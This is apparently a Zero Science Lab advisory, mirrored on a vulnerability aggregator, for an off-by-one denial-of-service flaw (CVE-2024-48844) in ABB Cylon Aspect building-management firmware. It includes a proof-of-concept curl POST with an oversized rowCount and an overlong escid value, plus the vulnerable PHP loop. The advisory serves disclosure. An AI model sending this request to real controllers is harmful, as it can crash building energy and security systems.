ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS

🗓️ 09 Jan 2025 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 539 Views

Off-by-One vulnerability in ABB Cylon Aspect allowing DoS and data manipulation via script access.

Reporter	Title	Published	Views	Family All 13
0day.today	ABB Cylon Aspect 3.08.02 escDevicesUpdate.php Denial of Service Vulnerability	9 Jan 202500:00	–	zdt
Circl	CVE-2024-48844	5 Dec 202413:07	–	circl
CNNVD	ABB ASPECT 安全漏洞	5 Dec 202400:00	–	cnnvd
CVE	CVE-2024-48844	5 Dec 202412:41	–	cve
Cvelist	CVE-2024-48844 Denial of Service, DoS	5 Dec 202412:41	–	cvelist
Exploit DB	ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)	15 Apr 202500:00	–	exploitdb
EUVD	EUVD-2024-43199	3 Oct 202520:07	–	euvd
NCSC	Vulnerabilities fixed in ABB ASPECT, NEXUS Series and MATRIX Series	6 Dec 202411:49	–	ncsc
NVD	CVE-2024-48844	5 Dec 202413:15	–	nvd
OSV	CVE-2024-48844	5 Dec 202413:15	–	osv

<html><body><p>ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: &lt;=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: A vulnerability was identified in a PHP script where an off-by-one
error in array access could lead to undefined behavior and potential DoS.
The issue arises in a loop that iterates over an array using a &lt; condition,
allowing access to an out-of-bounds index. This can trigger errors or unexpected
behavior when processing data, potentially crashing the application. Successful
exploitation of this vulnerability can lead to a crash or disruption of service,
especially if the script handles large data sets. This issue can be triggered
via the rowCount POST parameter in the Electronic Security Control device update
script.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5902
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5902.php
CVE ID: CVE-2024-48844
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48844


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl http://192.168.73.31/escDevicesUpdate.php \
&gt; -H "Cookie: PHPSESSID=xxx" \
&gt; -d "rowCount=2511531337&amp;\
&gt; escid1=192.168.1.1&amp;\
&gt; remove1=0&amp;\
&gt; escid2=192.168.1.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&amp;\
&gt; remove2=0&amp;\
&gt; etc.
&gt; etc.


$ cat escDevicesUpdate.php
...
...
$ini = INI::read($comproperties);

unset($ini['comm']['esc-ip-addr']);

$rowCount = $_POST['rowCount'];

for ($i = 1; $i &lt; $rowCount; $i++) {
    $fieldEscid = "escid" . $i;
    $fieldRemove = "remove" . $i;
    if ($_POST[$fieldRemove] != 1) {
        $escid = trim($_POST[$fieldEscid]);
        $ini['comm']['esc-ip-addr'][$i] = $escid;
    }
}

if (!INI::write($comproperties, $ini)) {
    logWarning("ESC device listt modification FAILED");
    $myLine = __LINE__;
    errorCall($myLine);
}
...
</p></body></html>

09 Jan 2025 00:00Current

6.6Medium risk

Vulners AI Score6.6

CVSS 3.16.5 - 7.7

CVSS 47.2

EPSS0.08272

SSVC